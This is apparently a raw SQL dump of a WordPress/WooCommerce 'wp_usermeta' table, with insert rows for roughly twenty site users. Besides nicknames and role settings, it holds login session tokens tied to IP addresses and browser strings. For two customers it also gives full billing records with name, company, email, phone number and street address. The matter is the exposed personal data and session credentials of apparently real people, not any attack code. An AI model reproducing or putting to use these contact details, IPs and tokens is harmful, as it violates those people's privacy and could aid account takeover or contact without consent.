INSERT INTO `wp_usermeta` VALUES (18778, 1258, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18779, 1258, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18780, 1258, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18781, 1258, '_yoast_wpseo_profile_updated', '1496774488'); 
INSERT INTO `wp_usermeta` VALUES (18782, 1258, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18783, 1259, 'nickname', 'leon.oehlers'); 
INSERT INTO `wp_usermeta` VALUES (18784, 1259, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18785, 1259, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18786, 1259, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18787, 1259, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18788, 1259, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18789, 1259, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18790, 1259, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18791, 1259, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18792, 1259, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18793, 1259, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18794, 1259, '_yoast_wpseo_profile_updated', '1496774826'); 
INSERT INTO `wp_usermeta` VALUES (18795, 1259, 'session_tokens', 'a:1:{s:64:"7cec03c778d13dbedcf141c7d0a9392072698d126d1bd638531845a9cd761b77";a:4:{s:10:"expiration";i:1497984434;s:2:"ip";s:12:"97.77.39.130";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496774834;}}'); 
INSERT INTO `wp_usermeta` VALUES (18796, 1260, 'nickname', 'helena.nicolas1952'); 
INSERT INTO `wp_usermeta` VALUES (18797, 1260, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18798, 1260, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18799, 1260, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18800, 1260, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18801, 1260, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18802, 1260, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18803, 1260, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18804, 1260, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18805, 1260, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18806, 1260, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18807, 1260, '_yoast_wpseo_profile_updated', '1496789346'); 
INSERT INTO `wp_usermeta` VALUES (18808, 1260, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18809, 1261, 'nickname', 'todd.r.duff'); 
INSERT INTO `wp_usermeta` VALUES (18810, 1261, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18811, 1261, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18812, 1261, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18813, 1261, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18814, 1261, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18815, 1261, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18816, 1261, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18817, 1261, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18818, 1261, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18819, 1261, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18820, 1261, '_yoast_wpseo_profile_updated', '1496795564'); 
INSERT INTO `wp_usermeta` VALUES (18821, 1261, 'session_tokens', 'a:2:{s:64:"f71344772abce09bde529a26462bed5916c91e105e411a6199c25fa4b0a2cc93";a:4:{s:10:"expiration";i:1498005175;s:2:"ip";s:12:"130.76.24.27";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";s:5:"login";i:1496795575;}s:64:"4c30ad63e649948c079ad93abf6013475b585e8a6cd6bc6681618cc76d080e0d";a:4:{s:10:"expiration";i:1497135921;s:2:"ip";s:12:"130.76.24.17";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";s:5:"login";i:1496963121;}}'); 
INSERT INTO `wp_usermeta` VALUES (18822, 1261, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (18823, 1262, 'nickname', 'rose.johnson'); 
INSERT INTO `wp_usermeta` VALUES (18824, 1262, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18825, 1262, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18826, 1262, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18827, 1262, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18828, 1262, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18829, 1262, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18830, 1262, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18831, 1262, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18832, 1262, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18833, 1262, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18834, 1262, '_yoast_wpseo_profile_updated', '1496799265'); 
INSERT INTO `wp_usermeta` VALUES (18835, 1262, 'session_tokens', 'a:1:{s:64:"59cc1a231574a6afea067bf8b53f06685f3934a2797948378f45123c888a7192";a:4:{s:10:"expiration";i:1498008875;s:2:"ip";s:13:"184.23.193.42";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496799275;}}'); 
INSERT INTO `wp_usermeta` VALUES (18836, 1263, 'nickname', 'wynia11963'); 
INSERT INTO `wp_usermeta` VALUES (18837, 1263, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18838, 1263, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18839, 1263, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18840, 1263, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18841, 1263, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18842, 1263, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18843, 1263, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18844, 1263, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18845, 1263, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18846, 1263, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18847, 1263, '_yoast_wpseo_profile_updated', '1496799312'); 
INSERT INTO `wp_usermeta` VALUES (18848, 1263, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18849, 1264, 'nickname', 'rose.johnson1'); 
INSERT INTO `wp_usermeta` VALUES (18850, 1264, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18851, 1264, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18852, 1264, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18853, 1264, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18854, 1264, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18855, 1264, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18856, 1264, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18857, 1264, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18858, 1264, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18859, 1264, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18860, 1264, '_yoast_wpseo_profile_updated', '1496799798'); 
INSERT INTO `wp_usermeta` VALUES (18861, 1264, 'session_tokens', 'a:1:{s:64:"efc110240038b876640b2b72f91faa1fbae12525a1f6b24e1508eb14a5213f67";a:4:{s:10:"expiration";i:1498009406;s:2:"ip";s:13:"184.23.193.42";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496799806;}}'); 
INSERT INTO `wp_usermeta` VALUES (18862, 1264, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (18863, 1265, 'nickname', 'stacyyang1993'); 
INSERT INTO `wp_usermeta` VALUES (18864, 1265, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18865, 1265, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18866, 1265, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18867, 1265, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18868, 1265, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18869, 1265, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18870, 1265, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18871, 1265, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18872, 1265, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18873, 1265, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18874, 1265, '_yoast_wpseo_profile_updated', '1496802074'); 
INSERT INTO `wp_usermeta` VALUES (18875, 1265, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18876, 1266, 'nickname', 'emlehman1983'); 
INSERT INTO `wp_usermeta` VALUES (18877, 1266, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18878, 1266, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18879, 1266, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18880, 1266, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18881, 1266, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18882, 1266, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18883, 1266, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18884, 1266, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18885, 1266, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18886, 1266, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18887, 1266, '_yoast_wpseo_profile_updated', '1496804298'); 
INSERT INTO `wp_usermeta` VALUES (18888, 1266, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18889, 160, 'session_tokens', 'a:1:{s:64:"0444e41665c1f01d32258fa9b419da67f1b552c6792f56f3bc95388810f092df";a:4:{s:10:"expiration";i:1496996915;s:2:"ip";s:12:"37.152.46.90";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496824115;}}'); 
INSERT INTO `wp_usermeta` VALUES (18890, 160, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (18891, 1267, 'nickname', 'niknikmorgan1972'); 
INSERT INTO `wp_usermeta` VALUES (18892, 1267, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18893, 1267, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18894, 1267, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18895, 1267, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18896, 1267, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18897, 1267, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18898, 1267, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18899, 1267, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18900, 1267, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18901, 1267, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18902, 1267, '_yoast_wpseo_profile_updated', '1496830025'); 
INSERT INTO `wp_usermeta` VALUES (18903, 1267, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18904, 1268, 'nickname', 'daryladdis1963'); 
INSERT INTO `wp_usermeta` VALUES (18905, 1268, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18906, 1268, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18907, 1268, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18908, 1268, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18909, 1268, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18910, 1268, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18911, 1268, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18912, 1268, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18913, 1268, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18914, 1268, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18915, 1268, '_yoast_wpseo_profile_updated', '1496831469'); 
INSERT INTO `wp_usermeta` VALUES (18916, 1268, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18917, 1269, 'nickname', 'bethan_melbourne1963'); 
INSERT INTO `wp_usermeta` VALUES (18918, 1269, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18919, 1269, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18920, 1269, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18921, 1269, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18922, 1269, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18923, 1269, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18924, 1269, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18925, 1269, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18926, 1269, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18927, 1269, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18928, 1269, '_yoast_wpseo_profile_updated', '1496831535'); 
INSERT INTO `wp_usermeta` VALUES (18929, 1269, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18930, 1270, 'nickname', 'barry.bowman'); 
INSERT INTO `wp_usermeta` VALUES (18931, 1270, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18932, 1270, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18933, 1270, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18934, 1270, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18935, 1270, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18936, 1270, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18937, 1270, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18938, 1270, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18939, 1270, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18940, 1270, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18941, 1270, '_yoast_wpseo_profile_updated', '1496841783'); 
INSERT INTO `wp_usermeta` VALUES (18942, 1270, 'session_tokens', 'a:1:{s:64:"6a688cb8cf5b16837a06f4581c2b9abd3bdc50dedf29347f30cca2b09023006e";a:4:{s:10:"expiration";i:1498051393;s:2:"ip";s:13:"208.89.225.33";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496841793;}}'); 
INSERT INTO `wp_usermeta` VALUES (18943, 1270, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (18944, 1271, 'nickname', 'md_brown2004'); 
INSERT INTO `wp_usermeta` VALUES (18945, 1271, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18946, 1271, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18947, 1271, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18948, 1271, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18949, 1271, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18950, 1271, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18951, 1271, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18952, 1271, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18953, 1271, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18954, 1271, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18955, 1271, '_yoast_wpseo_profile_updated', '1496846526'); 
INSERT INTO `wp_usermeta` VALUES (18956, 1271, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (18957, 1272, 'nickname', 'beramsey'); 
INSERT INTO `wp_usermeta` VALUES (18958, 1272, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18959, 1272, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18960, 1272, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18961, 1272, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18962, 1272, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18963, 1272, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18964, 1272, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18965, 1272, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18966, 1272, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18967, 1272, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18968, 1272, '_yoast_wpseo_profile_updated', '1496847444'); 
INSERT INTO `wp_usermeta` VALUES (18970, 1272, 'billing_first_name', 'Brian'); 
INSERT INTO `wp_usermeta` VALUES (18971, 1272, 'billing_last_name', 'Ramsey'); 
INSERT INTO `wp_usermeta` VALUES (18972, 1272, 'billing_company', 'Stebbins Eng. and Mfg. Co.'); 
INSERT INTO `wp_usermeta` VALUES (18973, 1272, 'billing_email', 'beramsey@stebbinseng.com'); 
INSERT INTO `wp_usermeta` VALUES (18974, 1272, 'billing_phone', '315-661-2668'); 
INSERT INTO `wp_usermeta` VALUES (18975, 1272, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (18976, 1272, 'billing_address_1', '363 Eastern Boulevard'); 
INSERT INTO `wp_usermeta` VALUES (18977, 1272, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (18978, 1272, 'billing_city', 'Watertown'); 
INSERT INTO `wp_usermeta` VALUES (18979, 1272, 'billing_state', 'NY'); 
INSERT INTO `wp_usermeta` VALUES (18980, 1272, 'billing_postcode', '13601'); 
INSERT INTO `wp_usermeta` VALUES (18982, 1273, 'nickname', 'Gregory.Fidler'); 
INSERT INTO `wp_usermeta` VALUES (18983, 1273, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18984, 1273, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18985, 1273, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18986, 1273, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18987, 1273, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (18988, 1273, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (18989, 1273, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (18990, 1273, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (18991, 1273, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (18992, 1273, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (18993, 1273, '_yoast_wpseo_profile_updated', '1496849409'); 
INSERT INTO `wp_usermeta` VALUES (18994, 1273, 'session_tokens', 'a:3:{s:64:"7bf2696467f427d9ba6eb29b15d07ed853b43e51d554c76c409aa41a5254fe9d";a:4:{s:10:"expiration";i:1498059017;s:2:"ip";s:14:"192.107.246.16";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496849417;}s:64:"df6ea0fed0ea73c56ee95d41143f13f4a099c3bbdf7c294d4554d1a612340409";a:4:{s:10:"expiration";i:1497022548;s:2:"ip";s:14:"192.107.246.16";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496849748;}s:64:"f01302455f36546d87124b617f3a7f9d3773dc054f3e3eccaedacf504975bb19";a:4:{s:10:"expiration";i:1497022554;s:2:"ip";s:14:"192.107.246.16";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1496849754;}}'); 
INSERT INTO `wp_usermeta` VALUES (18995, 1274, 'nickname', 'ernestas1960'); 
INSERT INTO `wp_usermeta` VALUES (18996, 1274, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18997, 1274, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (18998, 1274, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (18999, 1274, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19000, 1274, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19001, 1274, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19002, 1274, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (19003, 1274, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19004, 1274, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (19005, 1274, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (19006, 1274, '_yoast_wpseo_profile_updated', '1496865781'); 
INSERT INTO `wp_usermeta` VALUES (19007, 1274, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (19008, 1275, 'nickname', 'bmwandrew'); 
INSERT INTO `wp_usermeta` VALUES (19009, 1275, 'first_name', 'Andrew'); 
INSERT INTO `wp_usermeta` VALUES (19010, 1275, 'last_name', 'Sanchez'); 
INSERT INTO `wp_usermeta` VALUES (19011, 1275, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19012, 1275, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19013, 1275, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19014, 1275, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19015, 1275, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (19016, 1275, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19017, 1275, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (19018, 1275, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (19019, 1275, '_yoast_wpseo_profile_updated', '1496866373'); 
INSERT INTO `wp_usermeta` VALUES (19020, 1275, 'session_tokens', 'a:1:{s:64:"142337ca1e5c9d22c2c481ae14ff34cd83a0e23e1da97d9b141acab7f6614f33";a:4:{s:10:"expiration";i:1498075983;s:2:"ip";s:13:"71.209.243.80";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496866383;}}'); 
INSERT INTO `wp_usermeta` VALUES (19021, 1275, 'last_update', '1496866799'); 
INSERT INTO `wp_usermeta` VALUES (19022, 1275, 'billing_first_name', 'Andrew'); 
INSERT INTO `wp_usermeta` VALUES (19023, 1275, 'billing_last_name', 'Sanchez'); 
INSERT INTO `wp_usermeta` VALUES (19024, 1275, 'billing_company', 'Bavarian Motors Ltd'); 
INSERT INTO `wp_usermeta` VALUES (19025, 1275, 'billing_email', 'bmwandrew@cox.net'); 
INSERT INTO `wp_usermeta` VALUES (19026, 1275, 'billing_phone', '602-254-7380'); 
INSERT INTO `wp_usermeta` VALUES (19027, 1275, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (19028, 1275, 'billing_address_1', '5708 n 3rd ave'); 
INSERT INTO `wp_usermeta` VALUES (19029, 1275, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (19030, 1275, 'billing_city', 'Phoenix'); 
INSERT INTO `wp_usermeta` VALUES (19031, 1275, 'billing_state', 'AZ'); 
INSERT INTO `wp_usermeta` VALUES (19032, 1275, 'billing_postcode', '85013'); 
INSERT INTO `wp_usermeta` VALUES (19033, 1276, 'nickname', 'edmartinez'); 
INSERT INTO `wp_usermeta` VALUES (19034, 1276, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19035, 1276, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19036, 1276, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19037, 1276, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19038, 1276, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19039, 1276, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19040, 1276, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (19041, 1276, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19042, 1276, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (19043, 1276, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (19044, 1276, '_yoast_wpseo_profile_updated', '1496876507'); 
INSERT INTO `wp_usermeta` VALUES (19046, 1277, 'nickname', 'samkok1999'); 
INSERT INTO `wp_usermeta` VALUES (19047, 1277, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19048, 1277, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19049, 1277, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19050, 1277, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19051, 1277, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19052, 1277, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19053, 1277, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (19054, 1277, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19055, 1277, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (19056, 1277, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (19057, 1277, '_yoast_wpseo_profile_updated', '1496885291'); 
INSERT INTO `wp_usermeta` VALUES (19058, 1277, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (19059, 1278, 'nickname', '13817059597'); 
INSERT INTO `wp_usermeta` VALUES (19060, 1278, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19061, 1278, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19062, 1278, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19063, 1278, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19064, 1278, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19065, 1278, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19066, 1278, 'use_ssl', '0'); 
